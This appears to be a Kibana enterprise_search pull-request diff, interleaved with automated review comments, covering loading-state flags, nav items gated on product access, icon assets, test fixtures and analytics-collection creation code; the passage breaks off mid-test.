=> [Status.LOADING, Status.IDLE].includes(status), + () => [selectors.status, selectors.isFirstRequest], + (status, isFirstRequest) => [Status.LOADING, Status.IDLE].includes(status) && isFirstRequest, ], }), }); diff --git a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/search_indices.test.tsx b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/search_indices.test.tsx index 105d287260b57..8b20cbaadb9c0 100644 --- a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/search_indices.test.tsx 
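Review bot: The new `isFirstRequest` reducer and the `&& isFirstRequest` term in the `isLoading` selector change the meaning of `isLoading` from "a request is in flight" to "the first request since `setIsFirstRequest` is in flight", and neither site has a comment saying so. A one-line note above the reducer would save the next reader a trip to search_indices.tsx: `// Only the first fetch after mount reports isLoading; later searches and pagination keep the table visible.` Because the flag only returns to `true` through `setIsFirstRequest`, a consumer that mounts the logic without dispatching that action never sees a loading state after the first response; that is presumably intended, given the effect added in search_indices.tsx.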
+++ b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/search_indices.test.tsx @@ -33,6 +33,7 @@ const mockValues = { const mockActions = { fetchIndices: jest.fn(), onPaginate: jest.fn(), + setIsFirstRequest: jest.fn(), }; describe('SearchIndices', () => { @@ -55,6 +56,7 @@ describe('SearchIndices', () => { expect(wrapper.find(GettingStartedSteps)).toHaveLength(1); expect(wrapper.find(ElasticsearchResources)).toHaveLength(1); + expect(mockActions.setIsFirstRequest).toHaveBeenCalled(); }); }); diff --git a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/search_indices.tsx b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/search_indices.tsx index b6b0f433f6d17..96019c8139c97 100644 --- a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/search_indices.tsx +++ b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/search_indices.tsx @@ -49,7 +49,7 @@ export const baseBreadcrumbs = [ ]; export const SearchIndices: React.FC = () => { - const { fetchIndices, onPaginate } = useActions(IndicesLogic); + const { fetchIndices, onPaginate, setIsFirstRequest } = useActions(IndicesLogic); const { meta, indices, hasNoIndices, isLoading } = useValues(IndicesLogic); const [showHiddenIndices, setShowHiddenIndices] = useState(false); const [searchQuery, setSearchValue] = useState(''); 
@@ -58,18 +58,29 @@ export const SearchIndices: React.FC = () => { 'enterprise-search-indices-callout-dismissed', false ); + + useEffect(() => { + // We don't want to trigger loading for each search query change, so we need this + // flag to set if the call to backend is first request. + setIsFirstRequest(); + }, []); + useEffect(() => { - fetchIndices({ meta, returnHiddenIndices: showHiddenIndices, searchQuery }); + fetchIndices({ + meta, + returnHiddenIndices: showHiddenIndices, + searchQuery, + }); }, [searchQuery, meta.page.current, showHiddenIndices]); const pageTitle = isLoading ? '' - : indices.length !== 0 - ? i18n.translate('xpack.enterpriseSearch.content.searchIndices.searchIndices.pageTitle', { - defaultMessage: 'Elasticsearch indices', - }) - : i18n.translate('xpack.enterpriseSearch.content.searchIndices.searchIndices.emptyPageTitle', { + : hasNoIndices + ? i18n.translate('xpack.enterpriseSearch.content.searchIndices.searchIndices.emptyPageTitle', { defaultMessage: 'Welcome to Enterprise Search', + }) + : i18n.translate('xpack.enterpriseSearch.content.searchIndices.searchIndices.pageTitle', { + defaultMessage: 'Elasticsearch indices', }); return ( diff --git a/x-pack/plugins/enterprise_search/public/applications/index.tsx b/x-pack/plugins/enterprise_search/public/applications/index.tsx index 45179f6b55deb..5af50fce587fe 100644 --- a/x-pack/plugins/enterprise_search/public/applications/index.tsx +++ b/x-pack/plugins/enterprise_search/public/applications/index.tsx @@ -18,7 +18,7 @@ import { I18nProvider } from '@kbn/i18n-react'; import { KibanaContextProvider, KibanaThemeProvider } from '@kbn/kibana-react-plugin/public'; -import { InitialAppData } from '../../common/types'; +import { InitialAppData, ProductAccess } from '../../common/types'; import { PluginsStart, ClientConfigType, ClientData } from '../plugin'; import { externalUrl } from './shared/enterprise_search_url'; 
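Review bot: The two mount effects rely on declaration order: `setIsFirstRequest()` has to run before `fetchIndices(...)` so the first request is flagged before its status changes, and React runs them in that order only because they are declared in this sequence. The existing comment explains the flag but not the ordering; extending it with `// Must run before the fetchIndices effect below` would protect against a reorder. Both dependency arrays omit the kea actions, which is fine while those are stable references but will be flagged by react-hooks/exhaustive-deps if it is enabled. The component body continues past the end of this hunk.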
@@ -41,6 +41,12 @@ export const renderApp = ( const { publicUrl, errorConnectingMessage, ...initialData } = data; externalUrl.enterpriseSearchUrl = publicUrl || config.host || ''; + const noProductAccess: ProductAccess = { + hasAppSearchAccess: false, + hasWorkplaceSearchAccess: false, + }; + const productAccess = data.access || noProductAccess; + const EmptyContext: FC = ({ children }) => <>{children}; const CloudContext = plugins.cloud?.CloudContextProvider || EmptyContext; @@ -49,6 +55,7 @@ export const renderApp = ( const unmountKibanaLogic = mountKibanaLogic({ config, + productAccess, charts: plugins.charts, cloud: plugins.cloud, history: params.history, diff --git a/x-pack/plugins/enterprise_search/public/applications/shared/kibana/kibana_logic.ts b/x-pack/plugins/enterprise_search/public/applications/shared/kibana/kibana_logic.ts index 07aa3974b6479..d579cf17e5be9 100644 --- a/x-pack/plugins/enterprise_search/public/applications/shared/kibana/kibana_logic.ts +++ b/x-pack/plugins/enterprise_search/public/applications/shared/kibana/kibana_logic.ts @@ -14,6 +14,8 @@ import { CloudSetup } from '@kbn/cloud-plugin/public'; import { ApplicationStart, ChromeBreadcrumb, ScopedHistory } from '@kbn/core/public'; import { SecurityPluginStart } from '@kbn/security-plugin/public'; +import { ProductAccess } from '../../../../common/types'; + import { HttpLogic } from '../http'; import { createHref, CreateHrefOptions } from '../react_router_helpers'; @@ -22,6 +24,7 @@ type RequiredFieldsOnly = { }; interface KibanaLogicProps { config: { host?: string }; + productAccess: ProductAccess; // Kibana core history: ScopedHistory; navigateToUrl: RequiredFieldsOnly; @@ -55,6 +58,7 @@ export const KibanaLogic = kea>({ }, {}, ], + productAccess: [props.productAccess, {}], security: [props.security, {}], setBreadcrumbs: [props.setBreadcrumbs, {}], setChromeIsVisible: [props.setChromeIsVisible, {}], 
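Review bot: `const productAccess = data.access || noProductAccess;` fails closed, which is the right default for an authorization-derived flag, but nothing at the site says so and a later reader may "fix" it to default to full access. A comment makes the choice deliberate: `// Fail closed: missing access data means no access to the legacy products.` `||` is appropriate here since `data.access` is an object rather than a scalar that could legitimately be falsy. `renderApp` continues outside this hunk.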
diff --git a/x-pack/plugins/enterprise_search/public/applications/shared/layout/nav.test.tsx b/x-pack/plugins/enterprise_search/public/applications/shared/layout/nav.test.tsx index a7a59916e7d09..ccc9c93c97951 100644 --- a/x-pack/plugins/enterprise_search/public/applications/shared/layout/nav.test.tsx +++ b/x-pack/plugins/enterprise_search/public/applications/shared/layout/nav.test.tsx @@ -9,10 +9,24 @@ jest.mock('./nav_link_helpers', () => ({ generateNavLink: jest.fn(({ to, items }) => ({ href: to, items })), })); +import { setMockValues } from '../../__mocks__/kea_logic'; + +import { ProductAccess } from '../../../../common/types'; + import { useEnterpriseSearchNav } from './nav'; describe('useEnterpriseSearchContentNav', () => { + beforeEach(() => { + jest.clearAllMocks(); + }); + it('returns an array of top-level Enterprise Search nav items', () => { + const fullProductAccess: ProductAccess = { + hasAppSearchAccess: true, + hasWorkplaceSearchAccess: true, + }; + setMockValues({ productAccess: fullProductAccess }); + expect(useEnterpriseSearchNav()).toEqual([ { href: '/app/enterprise_search/overview', 
@@ -53,4 +67,77 @@ describe('useEnterpriseSearchContentNav', () => { }, ]); }); + + it('excludes legacy products when the user has no access to them', () => { + const noProductAccess: ProductAccess = { + hasAppSearchAccess: false, + hasWorkplaceSearchAccess: false, + }; + + setMockValues({ productAccess: noProductAccess }); + + expect(useEnterpriseSearchNav()[2]).toEqual({ + id: 'search', + items: [ + { + href: '/app/enterprise_search/elasticsearch', + id: 'elasticsearch', + name: 'Elasticsearch', + }, + ], + name: 'Search', + }); + }); + + it('excludes App Search when the user has no access to it', () => { + const workplaceSearchProductAccess: ProductAccess = { + hasAppSearchAccess: false, + hasWorkplaceSearchAccess: true, + }; + + setMockValues({ productAccess: workplaceSearchProductAccess }); + + expect(useEnterpriseSearchNav()[2]).toEqual({ + id: 'search', + items: [ + { + href: '/app/enterprise_search/elasticsearch', + id: 'elasticsearch', + name: 'Elasticsearch', + }, + { + href: '/app/enterprise_search/workplace_search', + id: 'workplace_search', + name: 'Workplace Search', + }, + ], + name: 'Search', + }); + }); + + it('excludes Workplace Search when the user has no access to it', () => { + const appSearchProductAccess: ProductAccess = { + hasAppSearchAccess: true, + hasWorkplaceSearchAccess: false, + }; + + setMockValues({ productAccess: appSearchProductAccess }); + + expect(useEnterpriseSearchNav()[2]).toEqual({ + id: 'search', + items: [ + { + href: '/app/enterprise_search/elasticsearch', + id: 'elasticsearch', + name: 'Elasticsearch', + }, + { + href: '/app/enterprise_search/app_search', + id: 'app_search', + name: 'App Search', + }, + ], + name: 'Search', + }); + }); }); diff --git a/x-pack/plugins/enterprise_search/public/applications/shared/layout/nav.tsx b/x-pack/plugins/enterprise_search/public/applications/shared/layout/nav.tsx index c1af5095126f9..3611fd0a17375 100644 
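Review bot: Each new test reads `useEnterpriseSearchNav()[2]`, so any item added above the Search group breaks all three even though the behavior under test is unchanged. Looking the group up by id ties each test to the assertion it actually makes: `const search = useEnterpriseSearchNav().find((item) => item.id === 'search');` followed by `expect(search).toEqual({ ... })`. The three `productAccess` fixtures differ only in two booleans and could be built by one small helper to keep the cases readable.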
--- a/x-pack/plugins/enterprise_search/public/applications/shared/layout/nav.tsx +++ b/x-pack/plugins/enterprise_search/public/applications/shared/layout/nav.tsx @@ -5,6 +5,8 @@ * 2.0. */ +import { useValues } from 'kea'; + import { EuiSideNavItemType } from '@elastic/eui'; import { i18n } from '@kbn/i18n'; @@ -16,10 +18,13 @@ import { WORKPLACE_SEARCH_PLUGIN, } from '../../../../common/constants'; import { SEARCH_INDICES_PATH } from '../../enterprise_search_content/routes'; +import { KibanaLogic } from '../kibana'; import { generateNavLink } from './nav_link_helpers'; export const useEnterpriseSearchNav = () => { + const { productAccess } = useValues(KibanaLogic); + const navItems: Array> = [ { id: 'es_overview', @@ -63,26 +68,34 @@ export const useEnterpriseSearchNav = () => { to: ELASTICSEARCH_PLUGIN.URL, }), }, - { - id: 'app_search', - name: i18n.translate('xpack.enterpriseSearch.nav.appSearchTitle', { - defaultMessage: 'App Search', - }), - ...generateNavLink({ - shouldNotCreateHref: true, - to: APP_SEARCH_PLUGIN.URL, - }), - }, - { - id: 'workplace_search', - name: i18n.translate('xpack.enterpriseSearch.nav.workplaceSearchTitle', { - defaultMessage: 'Workplace Search', - }), - ...generateNavLink({ - shouldNotCreateHref: true, - to: WORKPLACE_SEARCH_PLUGIN.URL, - }), - }, + ...(productAccess.hasAppSearchAccess + ? [ + { + id: 'app_search', + name: i18n.translate('xpack.enterpriseSearch.nav.appSearchTitle', { + defaultMessage: 'App Search', + }), + ...generateNavLink({ + shouldNotCreateHref: true, + to: APP_SEARCH_PLUGIN.URL, + }), + }, + ] + : []), + ...(productAccess.hasWorkplaceSearchAccess + ? [ + { + id: 'workplace_search', + name: i18n.translate('xpack.enterpriseSearch.nav.workplaceSearchTitle', { + defaultMessage: 'Workplace Search', + }), + ...generateNavLink({ + shouldNotCreateHref: true, + to: WORKPLACE_SEARCH_PLUGIN.URL, + }), + }, + ] + : []), ], name: i18n.translate('xpack.enterpriseSearch.nav.searchExperiencesTitle', { defaultMessage: 'Search', 
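Review bot: The conditional spreads on `productAccess.hasAppSearchAccess` and `productAccess.hasWorkplaceSearchAccess` only decide what the side nav shows; they are not an access check, and the routes behind `APP_SEARCH_PLUGIN.URL` and `WORKPLACE_SEARCH_PLUGIN.URL` still have to enforce authorization on their own. A comment at the first spread keeps that distinction visible: `// Presentation only: hides legacy products the user cannot use; authorization is enforced by the products' own routes.` Because `productAccess` is typed as required on `KibanaLogic`, a consumer that mounts the logic without it throws here instead of rendering an empty group; the updated mocks account for that, other test setups may not.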
diff --git a/x-pack/plugins/enterprise_search/public/assets/client_libraries/dotnet.svg b/x-pack/plugins/enterprise_search/public/assets/client_libraries/dotnet.svg new file mode 100644 index 0000000000000..30fa56d08bffc --- /dev/null +++ b/x-pack/plugins/enterprise_search/public/assets/client_libraries/dotnet.svg @@ -0,0 +1,126 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/x-pack/plugins/enterprise_search/public/assets/client_libraries/go.svg b/x-pack/plugins/enterprise_search/public/assets/client_libraries/go.svg new file mode 100644 index 0000000000000..5b5fd6e7698af --- /dev/null +++ b/x-pack/plugins/enterprise_search/public/assets/client_libraries/go.svg @@ -0,0 +1,4 @@ + + + + diff --git a/x-pack/plugins/enterprise_search/public/assets/client_libraries/index.ts b/x-pack/plugins/enterprise_search/public/assets/client_libraries/index.ts new file mode 100644 index 0000000000000..0e0e774aa5bba --- /dev/null +++ b/x-pack/plugins/enterprise_search/public/assets/client_libraries/index.ts @@ -0,0 +1,28 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import dotnet from './dotnet.svg'; +import go from './go.svg'; +import java from './java.svg'; +import javascript from './javascript.svg'; +import perl from './perl.svg'; +import php from './php.svg'; +import python from './python.svg'; +import ruby from './ruby.svg'; +import rust from './rust.svg'; + +export const icons = { + dotnet, + go, + java, + javascript, + perl, + php, + python, + ruby, + rust, +}; 
diff --git a/x-pack/plugins/enterprise_search/public/assets/client_libraries/java.svg b/x-pack/plugins/enterprise_search/public/assets/client_libraries/java.svg new file mode 100644 index 0000000000000..dbe654cdd99cf --- /dev/null +++ b/x-pack/plugins/enterprise_search/public/assets/client_libraries/java.svg @@ -0,0 +1,3 @@ + + + diff --git a/x-pack/plugins/enterprise_search/public/assets/client_libraries/javascript.svg b/x-pack/plugins/enterprise_search/public/assets/client_libraries/javascript.svg new file mode 100644 index 0000000000000..cdb7bd1a03848 --- /dev/null +++ b/x-pack/plugins/enterprise_search/public/assets/client_libraries/javascript.svg @@ -0,0 +1,4 @@ + + + + diff --git a/x-pack/plugins/enterprise_search/public/assets/client_libraries/perl.svg b/x-pack/plugins/enterprise_search/public/assets/client_libraries/perl.svg new file mode 100644 index 0000000000000..72a2d21cc297a --- /dev/null +++ b/x-pack/plugins/enterprise_search/public/assets/client_libraries/perl.svg @@ -0,0 +1,11 @@ + + + + + + + + + + + diff --git a/x-pack/plugins/enterprise_search/public/assets/client_libraries/php.svg b/x-pack/plugins/enterprise_search/public/assets/client_libraries/php.svg new file mode 100644 index 0000000000000..b80e9a92c9d5f --- /dev/null +++ b/x-pack/plugins/enterprise_search/public/assets/client_libraries/php.svg @@ -0,0 +1,3 @@ + + + diff --git a/x-pack/plugins/enterprise_search/public/assets/client_libraries/python.svg b/x-pack/plugins/enterprise_search/public/assets/client_libraries/python.svg new file mode 100644 index 0000000000000..b2c778e6355c5 --- /dev/null +++ b/x-pack/plugins/enterprise_search/public/assets/client_libraries/python.svg @@ -0,0 +1,19 @@ + + + + + + + + + + + + + + + + + + + diff --git a/x-pack/plugins/enterprise_search/public/assets/client_libraries/ruby.svg b/x-pack/plugins/enterprise_search/public/assets/client_libraries/ruby.svg new file mode 100644 index 0000000000000..0af569f1ee7ae --- /dev/null 
+++ b/x-pack/plugins/enterprise_search/public/assets/client_libraries/ruby.svg @@ -0,0 +1,3 @@ + + + diff --git a/x-pack/plugins/enterprise_search/public/assets/client_libraries/rust.svg b/x-pack/plugins/enterprise_search/public/assets/client_libraries/rust.svg new file mode 100644 index 0000000000000..9cbccb35b2baf --- /dev/null +++ b/x-pack/plugins/enterprise_search/public/assets/client_libraries/rust.svg @@ -0,0 +1,3 @@ + + + diff --git a/x-pack/plugins/enterprise_search/server/__mocks__/fetch_indices.mock.ts b/x-pack/plugins/enterprise_search/server/__mocks__/fetch_indices.mock.ts new file mode 100644 index 0000000000000..5305cc8ecdb55 --- /dev/null +++ b/x-pack/plugins/enterprise_search/server/__mocks__/fetch_indices.mock.ts 
@@ -0,0 +1,126 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +export const mockSingleIndexResponse = { + 'search-regular-index': { + aliases: {}, + }, +}; + +export const mockSingleIndexStatsResponse = { + indices: { + 'search-regular-index': { + health: 'green', + status: 'open', + total: { + docs: { + count: 100, + deleted: 0, + }, + store: { + size_in_bytes: 108000, + }, + }, + uuid: '83a81e7e-5955-4255-b008-5d6961203f57', + }, + }, +}; + +export const mockMultiIndexResponse = { + 'hidden-index': { + aliases: { + 'alias-hidden-index': {}, + 'search-alias-hidden-index': {}, + }, + settings: { index: { hidden: 'true' } }, + }, + 'regular-index': { + aliases: { + 'alias-regular-index': {}, + 'search-alias-regular-index': {}, + }, + }, + 'search-prefixed-hidden-index': { + aliases: { + 'alias-search-prefixed-hidden-index': {}, + 'search-alias-search-prefixed-hidden-index': {}, + }, + settings: { index: { hidden: 'true' } }, + }, + 'search-prefixed-regular-index': { + aliases: { + 'alias-search-prefixed-regular-index': {}, + 'search-alias-search-prefixed-regular-index': {}, + }, + }, +}; + +export const mockMultiStatsResponse: { + indices: Record; +} = { + indices: { + 'alias-hidden-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'alias-regular-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'alias-search-prefixed-hidden-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'alias-search-prefixed-regular-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'hidden-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'regular-index': { + 
...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'search-alias-hidden-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'search-alias-regular-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'search-alias-search-prefixed-hidden-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'search-alias-search-prefixed-regular-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'search-prefixed-hidden-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'search-prefixed-regular-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + }, +}; + +export const mockPrivilegesResponse = Object.keys(mockMultiStatsResponse.indices).reduce< + Record +>((acc, key) => { + acc[key] = { manage: true, read: true }; + return acc; +}, {}); + +export const getIndexReturnValue = (indexName: string) => { + return { + ...mockMultiStatsResponse.indices[indexName], + alias: indexName.startsWith('alias') || indexName.startsWith('search-alias'), + count: 100, + name: indexName, + privileges: { manage: true, read: true }, + total: { + ...mockMultiStatsResponse.indices[indexName].total, + store: { + size_in_bytes: '105.47kb', + }, + }, + }; +}; diff --git a/x-pack/plugins/enterprise_search/server/index.ts b/x-pack/plugins/enterprise_search/server/index.ts index 41cd17181b68b..3c409c09ff642 100644 --- a/x-pack/plugins/enterprise_search/server/index.ts +++ b/x-pack/plugins/enterprise_search/server/index.ts @@ -42,3 +42,5 @@ export const CONNECTORS_INDEX = '.elastic-connectors'; export const CONNECTORS_JOBS_INDEX = '.elastic-connectors-sync-jobs'; export const CONNECTORS_VERSION = '1'; export const CRAWLERS_INDEX = '.ent-search-actastic-crawler2_configurations'; +export const ANALYTICS_COLLECTIONS_INDEX = '.elastic-analytics-collections'; +export const ANALYTICS_VERSION = '1'; 
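Review bot: `getIndexReturnValue` dereferences `mockMultiStatsResponse.indices[indexName].total` without a guard, so a name that is not a key of the stats fixture throws a TypeError from inside the mock rather than producing a readable test failure; a one-line check such as `if (!(indexName in mockMultiStatsResponse.indices)) throw new Error(\`no stats fixture for ${indexName}\`);` would make misuse obvious. The helper also hard-codes `count: 100` and `size_in_bytes: '105.47kb'`, duplicating the `100` / `108000` values already in `mockSingleIndexStatsResponse`; a comment saying the string is the expected human-readable rendering of `108000` bytes would tie the two together for the next maintainer. The two `Record` annotations in this hunk appear to have lost their type arguments in extraction; I have not treated that as a code defect.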
diff --git a/x-pack/plugins/enterprise_search/server/lib/analytics/add_analytics_collection.test.ts b/x-pack/plugins/enterprise_search/server/lib/analytics/add_analytics_collection.test.ts new file mode 100644 index 0000000000000..7f8e8401a37d9 --- /dev/null +++ b/x-pack/plugins/enterprise_search/server/lib/analytics/add_analytics_collection.test.ts 
@@ -0,0 +1,108 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { IScopedClusterClient } from '@kbn/core-elasticsearch-server'; + +import { ANALYTICS_COLLECTIONS_INDEX } from '../..'; +import { ErrorCode } from '../../../common/types/error_codes'; + +import { addAnalyticsCollection } from './add_analytics_collection'; +import { fetchAnalyticsCollectionByName } from './fetch_analytics_collection'; +import { setupAnalyticsCollectionIndex } from './setup_indices'; + +jest.mock('./fetch_analytics_collection', () => ({ fetchAnalyticsCollectionByName: jest.fn() })); +jest.mock('./setup_indices', () => ({ + setupAnalyticsCollectionIndex: jest.fn(), +})); + +describe('add analytics collection lib function', () => { + const mockClient = { + asCurrentUser: { + index: jest.fn(), + indices: { + create: jest.fn(), + exists: jest.fn(), + refresh: jest.fn(), + }, + }, + asInternalUser: {}, + }; + + beforeEach(() => { + jest.clearAllMocks(); + }); + + it('should add analytics collection', async () => { + mockClient.asCurrentUser.index.mockImplementation(() => ({ _id: 'fakeId' })); + mockClient.asCurrentUser.indices.exists.mockImplementation(() => false); + + await expect( + addAnalyticsCollection(mockClient as unknown as IScopedClusterClient, { + name: 'example', + }) + ).resolves.toEqual({ event_retention_day_length: 180, id: 'fakeId', name: 'example' }); + + expect(mockClient.asCurrentUser.index).toHaveBeenCalledWith({ + document: { + event_retention_day_length: 180, + name: 'example', + }, + index: ANALYTICS_COLLECTIONS_INDEX, + }); + }); + + it('should reject if index already exists', async () => { + mockClient.asCurrentUser.index.mockImplementation(() => ({ _id: 'fakeId' })); + (fetchAnalyticsCollectionByName as jest.Mock).mockImplementation(() => true); + 
+ await expect( + addAnalyticsCollection(mockClient as unknown as IScopedClusterClient, { + name: 'index_name', + }) + ).rejects.toEqual(new Error(ErrorCode.ANALYTICS_COLLECTION_ALREADY_EXISTS)); + expect(mockClient.asCurrentUser.index).not.toHaveBeenCalled(); + }); + + it('should create index if no analytics collection index exists', async () => { + mockClient.asCurrentUser.indices.exists.mockImplementation(() => false); + + (fetchAnalyticsCollectionByName as jest.Mock).mockImplementation(() => undefined); + + mockClient.asCurrentUser.index.mockImplementation(() => ({ _id: 'fakeId' })); + + await expect( + addAnalyticsCollection(mockClient as unknown as IScopedClusterClient, { + name: 'example', + }) + ).resolves.toEqual({ event_retention_day_length: 180, id: 'fakeId', name: 'example' }); + + expect(mockClient.asCurrentUser.index).toHaveBeenCalledWith({ + document: { + event_retention_day_length: 180, + name: 'example', + }, + index: ANALYTICS_COLLECTIONS_INDEX, + }); + + expect(setupAnalyticsCollectionIndex).toHaveBeenCalledWith(mockClient.asCurrentUser); + }); + + it('should not create index if status code is not 404', async () => { + mockClient.asCurrentUser.index.mockImplementationOnce(() => { + return Promise.reject({ statusCode: 500 }); + }); + mockClient.asCurrentUser.indices.exists.mockImplementation(() => true); + (fetchAnalyticsCollectionByName as jest.Mock).mockImplementation(() => false); + await expect( + addAnalyticsCollection(mockClient as unknown as IScopedClusterClient, { + name: 'example', + }) + ).rejects.toEqual({ statusCode: 500 }); + expect(setupAnalyticsCollectionIndex).not.toHaveBeenCalled(); + expect(mockClient.asCurrentUser.index).toHaveBeenCalledTimes(1); + }); +}); diff --git a/x-pack/plugins/enterprise_search/server/lib/analytics/add_analytics_collection.ts b/x-pack/plugins/enterprise_search/server/lib/analytics/add_analytics_collection.ts new file mode 100644 index 0000000000000..1cad55a3e884c --- /dev/null 
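Review bot: `jest.clearAllMocks()` in the `beforeEach` clears call records but not implementations, so the `mockImplementation` calls in 'should reject if index already exists' (`fetchAnalyticsCollectionByName` → `true`) and in the last test (`indices.exists` → `true`) survive into whichever test runs next, and the first test relies on `fetchAnalyticsCollectionByName` still being the bare `jest.fn()`; the suite is order-dependent, and `jest.resetAllMocks()` or an explicit implementation in every test would isolate it. The titles 'should reject if index already exists' and 'should not create index if status code is not 404' are carried over from the connectors suite; the former exercises an existing collection, not an index, e.g. `it('should reject if a collection with that name already exists', …)`. The `mockClient.asCurrentUser.indices.create` and `refresh` mocks are declared but never asserted on, which is fine but worth a glance if `refresh` is meant to be part of the contract.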
+++ b/x-pack/plugins/enterprise_search/server/lib/analytics/add_analytics_collection.ts @@ -0,0 +1,59 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import { IScopedClusterClient } from '@kbn/core/server'; + +import { ANALYTICS_COLLECTIONS_INDEX } from '../..'; +import { AnalyticsCollectionDocument, AnalyticsCollection } from '../../../common/types/analytics'; + +import { ErrorCode } from '../../../common/types/error_codes'; + +import { fetchAnalyticsCollectionByName } from './fetch_analytics_collection'; +import { setupAnalyticsCollectionIndex } from './setup_indices'; + +const createAnalyticsCollection = async ( + client: IScopedClusterClient, + document: AnalyticsCollectionDocument +): Promise => { + const analyticsCollection = await fetchAnalyticsCollectionByName(client, document.name); + + if (analyticsCollection) { + throw new Error(ErrorCode.ANALYTICS_COLLECTION_ALREADY_EXISTS); + } + + // index the document + const result = await client.asCurrentUser.index({ + document, + index: ANALYTICS_COLLECTIONS_INDEX, + }); + + await client.asCurrentUser.indices.refresh({ index: ANALYTICS_COLLECTIONS_INDEX }); + + return { + id: result._id, + ...document, + }; +}; + +export const addAnalyticsCollection = async ( + client: IScopedClusterClient, + input: { name: string } +): Promise => { + const document: AnalyticsCollectionDocument = { + event_retention_day_length: 180, + name: input.name, + }; + + const analyticsCollectionIndexExists = await client.asCurrentUser.indices.exists({ + index: ANALYTICS_COLLECTIONS_INDEX, + }); + + if (!analyticsCollectionIndexExists) { + await setupAnalyticsCollectionIndex(client.asCurrentUser); + } + + return await createAnalyticsCollection(client, document); +}; 
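Review bot: `createAnalyticsCollection` checks for a same-named collection via `fetchAnalyticsCollectionByName` and then indexes the document with an auto-generated `_id`, so nothing on the Elasticsearch side enforces uniqueness of `name`; two concurrent requests with the same name can both pass the check and both be stored, after which `fetchAnalyticsCollectionByName` returns an arbitrary one of them. If the name is the identity, indexing with `id: document.name` and `op_type: 'create'` makes the second write fail with a version conflict that can be mapped to `ErrorCode.ANALYTICS_COLLECTION_ALREADY_EXISTS`; if an opaque id is preferred, a comment stating that the pre-check is best-effort is the minimum. The return value spreads `document` after `id`, so a future `id` field on `AnalyticsCollectionDocument` would silently shadow the Elasticsearch id; `{ ...document, id: result._id }` is the safer order. The `// index the document` comment restates the call; a line explaining why `refresh` follows it (presumably so the new collection is immediately searchable by name) would carry more information.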
diff --git a/x-pack/plugins/enterprise_search/server/lib/analytics/fetch_analytics_collection.test.ts b/x-pack/plugins/enterprise_search/server/lib/analytics/fetch_analytics_collection.test.ts new file mode 100644 index 0000000000000..e157df1df16f6 --- /dev/null +++ b/x-pack/plugins/enterprise_search/server/lib/analytics/fetch_analytics_collection.test.ts 
@@ -0,0 +1,103 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { IScopedClusterClient } from '@kbn/core-elasticsearch-server'; + +import { ANALYTICS_COLLECTIONS_INDEX } from '../..'; + +import { fetchAnalyticsCollectionByName } from './fetch_analytics_collection'; +import { setupAnalyticsCollectionIndex } from './setup_indices'; + +jest.mock('./setup_indices', () => ({ + setupAnalyticsCollectionIndex: jest.fn(), +})); + +describe('fetch analytics collection lib function', () => { + const mockClient = { + asCurrentUser: { + search: jest.fn(), + }, + asInternalUser: {}, + }; + + beforeEach(() => { + jest.clearAllMocks(); + }); + + describe('fetch collection by name', () => { + it('should fetch analytics collection by name', async () => { + mockClient.asCurrentUser.search.mockImplementationOnce(() => + Promise.resolve({ hits: { hits: [{ _id: 'fakeId', _source: { name: 'example' } }] } }) + ); + + await expect( + fetchAnalyticsCollectionByName(mockClient as unknown as IScopedClusterClient, 'example') + ).resolves.toEqual({ id: 'fakeId', name: 'example' }); + + expect(mockClient.asCurrentUser.search).toHaveBeenCalledWith({ + index: ANALYTICS_COLLECTIONS_INDEX, + query: { + term: { + name: 'example', + }, + }, + }); + }); + + it('should call setup analytics collection index on index not found error', async () => { + mockClient.asCurrentUser.search.mockImplementationOnce(() => + Promise.reject({ + meta: { + body: { + error: { type: 'index_not_found_exception' }, + }, + }, + }) + ); + await expect( + fetchAnalyticsCollectionByName(mockClient as unknown as IScopedClusterClient, 'example') + ).resolves.toEqual(undefined); + expect(mockClient.asCurrentUser.search).toHaveBeenCalledWith({ + index: ANALYTICS_COLLECTIONS_INDEX, + query: { + term: { + name: 
